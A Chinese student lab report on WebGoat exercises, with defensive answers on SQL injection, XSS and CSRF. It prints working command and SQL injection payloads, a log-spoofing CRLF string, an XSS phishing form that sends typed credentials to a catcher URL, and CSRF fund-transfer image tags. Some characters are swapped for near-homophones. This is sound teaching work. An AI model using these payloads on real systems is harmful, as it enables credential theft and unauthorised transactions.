2017-2018-2 20155224 『网络对抗技术』Exp9：Web安全基础

实验完成状况

• 共完成11题

准备工做

• 在浏览器输入localhost:8080/WebGoat打开webgoat，左侧选择题目

• 右键选择Inspect Element开始调试

Injection Flaws

1. Command Injection

• 右键开始调试，在页面下拉菜单的源代码中添加"& netstat -an & ipconfig"

• 选中咱们改动的那一项，点击View查看结果

2. Numberic SQL Injection

• 将语句改成SELECT * FROM weather_data WHERE station = 101 OR 1=1，并在station的value处作相应修改

• 能够查看各地天气了

3. Log Spoofing

• 在username一栏输入：5224【学号】%0d%0aLogin Succeeded for username: admin

• 查看结果

4. LAB:SQL Injection

• 更改密码栏maxlength为100.

• 选择用户Neville (admin)登录，在密码栏输入' or 1=1 --

5. Database Backdoors

• 输入101查看我的信息

• 输入简单语句101; update employee set salary=5224进行攻击，这里没有作太多操做

6. Blind Numberic SQL Injection

• 利用相似于101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 2000 );的语句缩小范围，最终肯定pin值

Cross-Site Scripting(XSS)

1. Phishing with XSS

• 在Search栏输入表单代码

</form>
<script>
    function hack(){ 
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    } 
</script>
<form name="phish">
<br>
<br>
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

• 能够看到出现了相应表单，能够输入用户名密码

• 点击登录，能够接收到输入的用户名和密码

2. Reflected XSS Attacks

• 在最后一个对话框输入<script>alert('I am 5224')</script>【或其余警告】

• 弹出相应对话框

CSRF

1. Cross Site Request Forgery (CSRF)

• 在Message对话框中输入<img src="http://localhost:8080/WebGoat/attack?Screen=288&menu=900&transferFunds=500" width="1" height="1">

【注意Screen和menu的值应为本身页面右侧窗口出的数值】

2. CSRF Prompt By-Pass

• 在Message对话框中输入

<img src="attack?Screen=226&menu=900&transferFunds=5000" 
width="1" height="1"> 
<img src="attack?Screen=226&menu=900&transferFunds=confirm" 
width="1" height="1">

基础问题回答

1. SQL注入攻击原理，如何防护

• 攻击原理：SQL注入便是指web应用程序对用户输入数据的合法性没有判断，攻击者能够在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，以此来实现欺骗数据库服务器执行非受权的任意查询，从而进一步获得相应的数据信息。

• SQL注入通常流程是：

1. 寻找到SQL注入的位置

2. 判断服务器类型和后台数据库类型

3. 针对不通的服务器和数据库特色进行SQL注入攻击

• 防护措施：采用预编译语句，使用正则表达式过滤传入的参数，字符串过滤，jsp中调用该函数检查是否包函非法字符等。整体来讲必定要注意规范代码，尽可能减小有漏洞的地方。

2. XSS攻击的原理，如何防护

• 攻击原理：XSS又称CSS，全称Cross SiteScript，跨站脚本攻击，是Web程序中常见的漏洞，XSS属于被动式且用于客户端的攻击方式，因此容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码，当其它用户浏览该网站时，这段HTML代码会自动执行，从而达到攻击的目的。如，盗取用户Cookie、破坏页面结构、重定向到其它网站等。

• 防护措施：HttpOnly防止劫取Cookie；输入检查通常是检查用户输入的数据中是否包含一些特殊字符，如<、>、'、"等，若是发现存在特殊字符，则将这些字符过滤或者编码等。

3. CSRF攻击原理，如何防护

• 攻击原理：CSRF攻击的主要目的是让用户在不知情的状况下攻击本身已登陆的一个系统，相似于钓鱼。如用户当前已经登陆了邮箱，或bbs，同时用户又在使用另一个，已经被你控制的站点，咱们姑且叫它钓鱼网站。这个网站上面可能由于某个图片吸引你，你去点击一下，此时可能就会触发一个js的点击事件，构造一个bbs发帖的请求，去往你的bbs发帖，因为当前你的浏览器状态已是登录状态，因此session登录cookie信息都会跟正常的请求同样，纯自然的利用当前的登录状态，让用户在不知情的状况下，帮你发帖或干其余事情。

• 防护措施：验证HTTP Referer字段，在请求地址中添加token并验证，在HTTP头中自定义属性并验证等。

实验感想

有意思是真的有意思，个人kali全屏以后整个高斯模糊、我也是真的服气